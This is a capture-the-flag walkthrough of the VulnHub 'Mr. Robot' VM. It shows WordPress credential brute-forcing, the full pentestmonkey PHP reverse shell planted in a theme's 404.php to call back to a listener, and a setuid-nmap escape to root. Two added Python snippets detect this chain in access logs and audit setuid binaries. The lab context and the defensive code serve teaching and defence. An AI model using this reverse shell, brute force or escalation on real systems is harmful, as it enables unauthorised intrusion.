VulnHub VM: Mr. Robot

Download: https://www.vulnhub.com/entry/mr-robot-1,151/

Description:

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

There are three keys to find.

1. Find the target IP: 192.168.0.109

netdiscover -r 192.168.0.0/24

2. Scan the host for open ports; the scan lists ports 22, 80 and 443

nmap -A -p- 192.168.0.109

3. Browse to port 80 and port 443; both serve the same content, a page best described in one word: cool

4. Try a few common files: robots.txt, readme.txt

robots.txt turns out to contain something

It gives the first key and a dictionary file

readme.txt does not exist, and the resulting page reveals that this is a WordPress site

5. Since it is a WordPress site, go straight to a scanner; here Kali's bundled wpscan is used (if the tool gives you trouble, see my previous post)

The result shows that no usernames were found

6. Get into the default wp-admin backend and get a shell

A few weak passwords were tried without success, but something else stood out: when the username is wrong, the login page says "invalid username"

So the idea is to brute-force the username with the dictionary found a moment ago

Download the file, then sort it and remove duplicates

wget http://192.168.0.109/fsocity.dic
cat fsocity.dic|sort|uniq > dict.txt

Capture the login request with Burp Suite and brute-force the username first; three candidates come back, which suggests the username elliot is matched case-insensitively

Then brute-force the password, which gives ER28-0652

7. Log in to the backend and get a shell

With the credentials elliot/ER28-0652, log in to the backend, modify the 404 page, start a local listener, request the page, and get a shell

Log in to wp-admin

Replace the contents of 404.php with the contents of php-reverse-shell.php, changing the ip and port

https://192.168.0.109/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen&scrollto=1266

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.107';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // without this the function never sees the flag and always prints
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

On Kali, start a listener on local port 4444

nc -lvvp 4444

Request the 404.php page

https://192.168.0.109/wp-content/themes/twentyfifteen/404.php

Kali receives the shell

8. Privilege escalation

Get a tty through python

python -c 'import pty;pty.spawn("/bin/sh")'

The /home/robot directory holds the second key and a password file

Reading the key is denied for lack of permissions; the password file can be read

Look the hash up on an online md5 cracking site to get the plaintext

Log in as user robot with it and read the second key file; since port 22 showed as closed in the earlier scan, remote ssh login is not an option

That leaves the third key file; by the usual pattern it will be under the root directory, so privilege escalation is needed. Download LinEnum.sh to /tmp and run it

It turns up an nmap binary, so escalate through nmap; at that point we are root and can read the third key file

nmap --interactive     enter the interactive prompt
!sh
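Seen from the web server's side, the path from the dictionary download to the 404.php shell leaves a recognisable trail in the access log. The following is an added example, not part of the original walkthrough: a small Python detector that walks Apache-style log lines and reports, per client, the indicators used above (fetching fsocity.dic, a burst of POSTs to wp-login.php, a save through the theme editor, and a direct request for a theme PHP file). The log lines, the visitor 192.168.0.50, the date and the threshold of 20 login POSTs are constructed assumptions; plugin-editor.php is included as the obvious sibling of theme-editor.php.

```python
import re
from collections import defaultdict

# Prefix of an Apache common/combined log line: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Indicators taken from this walkthrough's chain (plugin-editor.php added as a sibling).
WORDLIST_PATHS = {"/fsocity.dic"}
EDITOR_PATHS = {"/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php"}
THEME_FILE_RE = re.compile(r"^/wp-content/themes/[^/]+/[^/]+\.php$")


def analyse(log_text, login_threshold=20):
    """Return {client_ip: [finding, ...]} for clients that match any indicator."""
    login_posts = defaultdict(int)
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not an access-log entry, skip it
        ip, method, path, status = m.groups()
        path = path.split("?", 1)[0]       # match on the path, ignore the query string
        if path in WORDLIST_PATHS:
            findings[ip].append(f"fetched the site's own wordlist {path}")
        elif method == "POST" and path == "/wp-login.php":
            login_posts[ip] += 1           # counted here, reported once below
        elif method == "POST" and path in EDITOR_PATHS:
            findings[ip].append(f"saved a file through {path} (status {status})")
        elif THEME_FILE_RE.match(path):
            findings[ip].append(f"requested a theme PHP file directly: {path}")
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings[ip].append(f"{n} POSTs to /wp-login.php (credential brute force)")
    return dict(findings)


def _line(ip, method, path, status, sec):
    """Build one constructed access-log line at 10:MM:SS on a fixed date."""
    return (f"{ip} - - [10/Oct/2020:10:{sec // 60:02d}:{sec % 60:02d} +0800] "
            f'"{method} {path} HTTP/1.1" {status} 0')


# Constructed sample traffic: 192.168.0.107 replays the walkthrough's steps,
# 192.168.0.50 is an ordinary visitor that must not be reported.
SAMPLE_LOG = "\n".join(
    [_line("192.168.0.107", "GET", "/robots.txt", 200, 1),
     _line("192.168.0.107", "GET", "/fsocity.dic", 200, 2)]
    + [_line("192.168.0.107", "POST", "/wp-login.php", 200, 10 + i) for i in range(25)]
    + [_line("192.168.0.50", "GET", "/", 200, 12),
       _line("192.168.0.107", "POST", "/wp-admin/theme-editor.php", 302, 300),
       _line("192.168.0.107", "GET", "/wp-content/themes/twentyfifteen/404.php", 200, 303)])
```

Call `analyse(open("/var/log/apache2/access.log").read())` on a real log; the same four findings on one client within minutes is the signature of this whole chain.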
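The root shell above exists only because a setuid-root nmap was left on the box, which is exactly what a periodic setuid audit would have flagged. As an added hardening check that is not part of this walkthrough, the Python below walks a list of directories, finds setuid files and ranks them: setuid-root binaries with a known interactive shell escape (nmap among them) are "critical", other setuid-root files are "review", and setuid files owned by non-root users are "info". The directory list and the escape list are assumptions.

```python
import os
import stat

# Binaries that hand out a shell when setuid-root; nmap (--interactive, as on this
# VM) is the one this walkthrough used, the rest are well-known equivalents.
SHELL_ESCAPE_BINARIES = {"nmap", "vim", "vi", "find", "bash", "sh", "python",
                         "perl", "less", "more", "awk", "cp", "env"}


def classify(name, mode, uid):
    """Severity for one file, or None if it is not a setuid regular file."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    if uid != 0:
        return "info"          # setuid to a non-root user: worth a look, not a root path
    return "critical" if name in SHELL_ESCAPE_BINARIES else "review"


def audit_suid(dirs):
    """Walk dirs (e.g. /usr/bin, /usr/local/bin) and return {path: severity}."""
    found = {}
    for d in dirs:
        for root, _sub, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)   # lstat: never follow symlinks
                except OSError:
                    continue              # vanished or unreadable, skip it
                sev = classify(name, st.st_mode, st.st_uid)
                if sev:
                    found[path] = sev
    return found


if __name__ == "__main__":
    for path, sev in sorted(audit_suid(["/usr/bin", "/usr/local/bin"]).items()):
        print(f"{sev:9} {path}")
```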

9. Supplement: directory scanning (another way to obtain the backend username and password)

Directory scan results

Visit some of the unusual directories

Visiting the 0 directory reveals the WordPress site

readme.html holds nothing of value

license.txt holds nothing of value either

Wait, why is there a scrollbar on the right? Something is going on here

Keep scrolling down

Further down there is a base64-encoded string: ZWxsaW90OkVSMjgtMDY1Mgo=

Decode it on an online decoder to get the username and password elliot:ER28-0652, which saves the time spent brute-forcing
